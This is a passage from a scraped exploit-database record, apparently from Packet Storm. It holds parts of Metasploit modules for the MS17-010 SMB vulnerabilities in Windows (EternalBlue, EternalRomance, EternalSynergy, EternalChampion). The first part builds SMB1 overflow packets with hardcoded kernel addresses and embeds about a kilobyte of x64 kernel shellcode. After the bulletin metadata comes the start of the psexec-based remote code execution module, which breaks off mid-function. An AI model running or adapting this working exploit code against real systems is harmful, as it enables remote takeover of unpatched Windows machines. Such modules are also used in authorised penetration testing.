\npkt \nend \n \n# Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit \ndef make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout) \ntimeout = (timeout * 0x10) + 3 \n \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x10\\x35\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x33\" # Trans2 request \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexIDs \n \npkt << \"\\x09\" # Word Count \npkt << \"\\x00\\x00\" # Total Param Count \npkt << \"\\x00\\x10\" # Total Data Count \npkt << \"\\x00\\x00\" # Max Param Count \npkt << \"\\x00\\x00\" # Max Data Count \npkt << \"\\x00\" # Max Setup Count \npkt << \"\\x00\" # Reserved \npkt << \"\\x00\\x10\" # Flags \npkt << \"\\x35\\x00\\xd0\" # Timeouts \npkt << timeout.chr \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x10\" # Parameter Count \n \n#pkt << \"\\x74\\x70\" # Parameter Offset \n#pkt << \"\\x47\\x46\" # Data Count \n#pkt << \"\\x45\\x6f\" # Data Offset \n#pkt << \"\\x4c\" # Setup Count \n#pkt << \"\\x4f\" # Reserved \n \nif type == :eb_trans2_exploit \nvprint_status(\"Making :eb_trans2_exploit packet\") \n \npkt << \"\\x41\" * 2957 \n \npkt << \"\\x80\\x00\\xa8\\x00\" # overflow \n \npkt << \"\\x00\" * 0x10 \npkt << \"\\xff\\xff\" \npkt << \"\\x00\" * 0x6 \npkt << \"\\xff\\xff\" \npkt << \"\\x00\" * 0x16 \n \npkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses \npkt << \"\\x00\" * 0x8 \npkt << \"\\x20\\xf0\\xdf\\xff\" \n \npkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64 \n \npkt << \"\\x60\\x00\\x04\\x10\" \npkt << \"\\x00\" * 4 \n \npkt << \"\\x80\\xef\\xdf\\xff\" \n \npkt << \"\\x00\" * 4 \npkt 
<< \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x10 \n \npkt << \"\\x60\\x00\\x04\\x10\" \npkt << \"\\x00\" * 0xc \npkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x8 \npkt << \"\\x80\\x10\" \npkt << \"\\x00\" * 0xe \npkt << \"\\x39\" \npkt << \"\\xbb\" \n \npkt << \"\\x41\" * 965 \n \nreturn pkt \nend \n \nif type == :eb_trans2_zero \nvprint_status(\"Making :eb_trans2_zero packet\") \npkt << \"\\x00\" * 2055 \npkt << \"\\x83\\xf3\" \npkt << \"\\x41\" * 2039 \n#pkt << \"\\x00\" * 4096 \nelse \nvprint_status(\"Making :eb_trans2_buffer packet\") \npkt << \"\\x41\" * 4096 \nend \n \npkt \n \nend \n \ndef make_smb1_nt_trans_packet(tree_id, user_id) \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x04\\x38\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\xa0\" # NT Trans \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n \npkt << \"\\x14\" # Word Count \npkt << \"\\x01\" # Max Setup Count \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x1e\\x00\\x00\\x00\" # Total Param Count \npkt << \"\\xd0\\x03\\x01\\x00\" # Total Data Count \npkt << \"\\x1e\\x00\\x00\\x00\" # Max Param Count \npkt << \"\\x00\\x00\\x00\\x00\" # Max Data Count \npkt << \"\\x1e\\x00\\x00\\x00\" # Param Count \npkt << \"\\x4b\\x00\\x00\\x00\" # Param Offset \npkt << \"\\xd0\\x03\\x00\\x00\" # Data Count \npkt << \"\\x68\\x00\\x00\\x00\" # Data Offset \npkt << \"\\x01\" # Setup Count \npkt << \"\\x00\\x00\" # Function <unknown> \npkt << \"\\x00\\x00\" # Unknown NT transaction (0) setup \npkt << \"\\xec\\x03\" # Byte 
Count \npkt << \"\\x00\" * 0x1f # NT Parameters \n \n# undocumented \npkt << \"\\x01\" \npkt << \"\\x00\" * 0x3cd \n \npkt \nend \n \ndef make_smb1_free_hole_session_packet(flags2, vcnum, native_os) \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x00\\x51\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x73\" # Session Setup AndX \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << flags2 # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\" # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << \"\\x00\\x00\" # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n#pkt << \"\\x00\\x00\" # Reserved \n \npkt << \"\\x0c\" # Word Count \npkt << \"\\xff\" # No further commands \npkt << \"\\x00\" # Reserved \npkt << \"\\x00\\x00\" # AndXOffset \npkt << \"\\x04\\x11\" # Max Buffer \npkt << \"\\x0a\\x00\" # Max Mpx Count \npkt << vcnum # VC Number \npkt << \"\\x00\\x00\\x00\\x00\" # Session key \npkt << \"\\x00\\x00\" # Security blob length \npkt << \"\\x00\\x00\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\\x00\\x80\" # Capabilities \npkt << \"\\x16\\x00\" # Byte count \n#pkt << \"\\xf0\" # Security Blob: <MISSING> \n#pkt << \"\\xff\\x00\\x00\\x00\" # Native OS \n#pkt << \"\\x00\\x00\" # Native LAN manager \n#pkt << \"\\x00\\x00\" # Primary domain \npkt << native_os \npkt << \"\\x00\" * 17 # Extra byte params \n \npkt \nend \n \ndef make_smb1_anonymous_login_packet \n# Neither Rex nor RubySMB appear to support Anon login? 
\npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x00\\x88\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x73\" # Session Setup AndX \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\" # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n \npkt << \"\\x0d\" # Word Count \npkt << \"\\xff\" # No further commands \npkt << \"\\x00\" # Reserved \npkt << \"\\x88\\x00\" # AndXOffset \npkt << \"\\x04\\x11\" # Max Buffer \npkt << \"\\x0a\\x00\" # Max Mpx Count \npkt << \"\\x00\\x00\" # VC Number \npkt << \"\\x00\\x00\\x00\\x00\" # Session key \npkt << \"\\x01\\x00\" # ANSI pw length \npkt << \"\\x00\\x00\" # Unicode pw length \npkt << \"\\x00\\x00\\x00\\x00\" # Reserved \npkt << \"\\xd4\\x00\\x00\\x00\" # Capabilities \npkt << \"\\x4b\\x00\" # Byte count \npkt << \"\\x00\" # ANSI pw \npkt << \"\\x00\\x00\" # Account name \npkt << \"\\x00\\x00\" # Domain name \n \n# Windows 2000 2195 \npkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\" \npkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\" \npkt << \"\\x00\\x00\" \n \n# Windows 2000 5.0 \npkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\" \npkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x30\\x00\\x00\\x00\" \n \npkt \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \n# ep_thl_b = EPROCESS.ThreadListHead.Blink offset \n# et_alertable = ETHREAD.Alertable offset \n# teb_acp = TEB.ActivationContextPointer offset \n# et_tle = ETHREAD.ThreadListEntry offset \ndef make_kernel_user_payload(ring3, proc_name, 
ep_thl_b, et_alertable, teb_acp, et_tle) \nsc = make_kernel_shellcode \nsc << [ring3.length].pack(\"S<\") \nsc << ring3 \nsc \nend \n \ndef make_kernel_shellcode \n# https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm \n# Name: kernel \n# Length: 1019 bytes \n \n#\"\\xcc\"+ \n\"\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\" + \n\"\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\\x00\\x00\\x00\\x48\\x89\\xC2\" + \n\"\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\\x65\\x48\\x89\\x24\\x25\\x10\" + \n\"\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x50\\x53\\x51\\x52\" + \n\"\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x41\\x54\\x41\\x55\\x41\" + \n\"\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\\x00\\x00\\x00\\x41\\x53\\x6A\" + \n\"\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\\x48\\x81\\xEC\\x58\\x01\\x00\" + \n\"\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\\x89\\x9D\\xC0\\x00\\x00\\x00\" + \n\"\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\\xD0\\x00\\x00\\x00\\x48\\xA1\" + \n\"\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x48\" + \n\"\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x30\\xFB\\xE8\" + \n\"\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x48\\x83\" + \n\"\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\\x41\\x5B\\x41\\x5A\\x41\\x59\" + \n\"\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\\x48\\x8B\\x24\\x25\\x10\\x00\" + \n\"\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\\xD0\\xFF\\x56\\x41\\x57\\x41\" + \n\"\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\\x66\\x83\\xE4\\xF0\\x48\\x83\" + \n\"\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\\x4C\\x8B\\x3C\\x25\\x38\\x00\" + \n\"\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\\x49\\xC1\\xE7\\x0C\\x49\\x81\" + 
\n\"\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\\xFE\\x4D\\x5A\\x75\\xEF\\x41\" + \n\"\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\\x48\\x89\\xC6\\x48\\x81\\xC6\" + \n\"\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\\xE8\\x03\\x02\\x00\\x00\\x48\" + \n\"\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\\x00\\x05\\x00\\x00\\x48\\x39\" + \n\"\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\\x36\\x48\\x39\\xCE\\x75\\xE2\" + \n\"\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\\x81\\xF9\\x00\\x00\\x01\\x00\" + \n\"\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\\xCB\\x41\\xBB\\x66\\x55\\xA2\" + \n\"\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\\x49\\x8B\\x0E\\x41\\xBB\\xA3\" + \n\"\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\\xC6\\xE8\\x50\\x01\\x00\\x00\" + \n\"\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\" + \n\"\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\\x11\\xDC\\xE8\\x81\\x01\\x00\" + \n\"\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\\x4E\\x08\\x49\\xC7\\x01\\x00\" + \n\"\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\\xC9\\x48\\x89\\x0A\\x48\\xF7\" + \n\"\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\\x20\\xE8\\x52\\x01\\x00\\x00\" + \n\"\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\\x3E\\x48\\x8D\\x35\\xE9\\x00\" + \n\"\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\\x00\\x66\\x81\\xC1\\xF9\\x00\" + \n\"\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x48\\x89\\xF1\\x48\" + \n\"\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\\x48\\x83\\xEC\\x20\\x41\\xBB\" + \n\"\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\\x83\\xC4\\x20\\x5A\\x59\\x48\" + \n\"\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\\x00\\x48\\x85\\xC0\\x74\\x0C\" + \n\"\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\\x72\\x05\\x48\\x8B\\x09\\xEB\" + \n\"\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\\x80\\xC2\\x90\\x31\\xC9\\x41\" + 
\n\"\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\\x48\\x89\\xC1\\x4C\\x8D\\x89\" + \n\"\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\\xE2\\x49\\x89\\xC4\\x4D\\x31\" + \n\"\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\\x50\\x48\\x83\\xEC\\x20\\x41\" + \n\"\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\\x31\\xD2\\x52\\x52\\x41\\x58\" + \n\"\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\\x9E\\xE8\\x82\\x00\\x00\\x00\" + \n\"\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\\x74\\x00\\x00\\x00\\x48\\x89\" + \n\"\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\\x00\\x00\\x48\\x89\\xEC\\x5D\" + \n\"\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\\xC3\\xE9\\xB5\\x00\\x00\\x00\" + \n\"\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x3C\\x61\\x7C\\x02\\x2C\\x20\" + \n\"\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\" + \n\"\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\\x48\\x8B\\x72\\x50\\x48\\x0F\" + \n\"\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\" + \n\"\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\" + \n\"\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xC2\\x8B\" + \n\"\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xD0\\x50\\x8B\" + \n\"\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\" + \n\"\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\\xD9\\x75\\xEC\\x58\\x44\\x8B\" + \n\"\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\\x01\" + \n\"\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\\x5A\\x41\\x58\\x41\\x59\\x41\" + \n\"\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\\x89\\xE5\\x48\\x83\\xEC\\x20\" + \n\"\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\\xFF\\x31\\xC9\\x51\\x51\\x51\" + \n\"\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\\x5A\\x48\\x83\\xEC\\x20\\x41\" + 
\n\"\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\\x48\\x89\\xEC\\x5D\\x41\\x5F\" + \n\"\\x5E\\xC3\" \nend \n \nend \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "PACKETSTORM:146236", "hash": "bd02644e28f045b0087dc78310444a2d", "type": "packetstorm", "bulletinFamily": "exploit", "title": "MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution", "description": "", "published": "2018-02-03T00:00:00", "modified": "2018-02-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/146236/MS17-010-EternalRomance-EternalSynergy-EternalChampion-SMB-Remote-Windows-Code-Execution.html", "reporter": "Shadow Brokers", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "lastseen": "2018-02-03T08:25:18", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 8.9, "vector": "NONE", "modified": "2018-02-03T08:25:18", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": 
["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "talosblog", "idList": 
["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0146", "MS:CVE-2017-0147"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "saint", "idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}], "modified": "2018-02-03T08:25:18", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/146236/ms17_010_psexec.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# Windows XP systems that are not part of a domain default to treating all \n# network logons as if they were Guest. This prevents SMB relay attacks from \n# gaining administrative access to these systems. 
This setting can be found \n# under: \n# \n# Local Security Settings > \n# Local Policies > \n# Security Options > \n# Network Access: Sharing and security model for local accounts \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010 \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::WbemExec \ninclude Msf::Auxiliary::Report \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution', \n'Description' => %q{ \nThis module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where \nprimitive. This will then be used to overwrite the connection session information with as an \nAdministrator session. From there, the normal psexec payload code execution is done. \n \nExploits a type confusion between Transaction and WriteAndX requests and a race condition in \nTransaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy \nexploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a \nnamed pipe. 
\n}, \n'Author' => \n[ \n'sleepya', # zzz_exploit idea and offsets \n'zerosum0x0', \n'Shadow Brokers', \n'Equation Group' \n], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'WfsDelay' => 10, \n'EXITFUNC' => 'thread' \n}, \n'References' => \n[ \n[ 'AKA', 'ETERNALSYNERGY' ], \n[ 'AKA', 'ETERNALROMANCE' ], \n[ 'AKA', 'ETERNALCHAMPION' ], \n[ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred \n[ 'MSB', 'MS17-010' ], \n[ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests \n[ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests \n[ 'CVE', '2017-0147'], # for EternalRomance reference \n[ 'URL', 'https://github.com/worawit/MS17-010' ], \n[ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ], \n[ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ], \n], \n'Payload' => \n{ \n'Space' => 3072, \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => \n[ \n[ 'Automatic', { } ], \n[ 'PowerShell', { } ], \n[ 'Native upload', { } ], \n[ 'MOF upload', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Mar 14 2017' \n)) \n \nregister_options( \n[ \nOptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share\", 'ADMIN$' ]) \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]), \nOptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]), \nOptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']), \nOptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil]) \n]) \nend \n \ndef exploit \nbegin \neternal_pwn(datastore['RHOST']) \nsmb_pwn() \n \nrescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e \nprint_error(\"#{e.message}\") \nrescue ::Errno::ECONNRESET, \n::Rex::Proto::SMB::Exceptions::LoginError, \n::Rex::HostUnreachable, \n::Rex::ConnectionTimeout, \n::Rex::ConnectionRefused => e \nprint_error(\"#{e.class}: #{e.message}\") \nrescue => error \nprint_error(error.class.to_s) \nprint_error(error.message) \nprint_error(error.backtrace.join(\"\\n\")) \nensure \neternal_cleanup() # restore session \nend \nend \n \ndef smb_pwn() \ncase target.name \nwhen 'Automatic' \nif powershell_installed? \nprint_status('Selecting PowerShell target') \npowershell \nelse \nprint_status('Selecting native target') \nnative_upload \nend \nwhen 'PowerShell' \npowershell \nwhen 'Native upload' 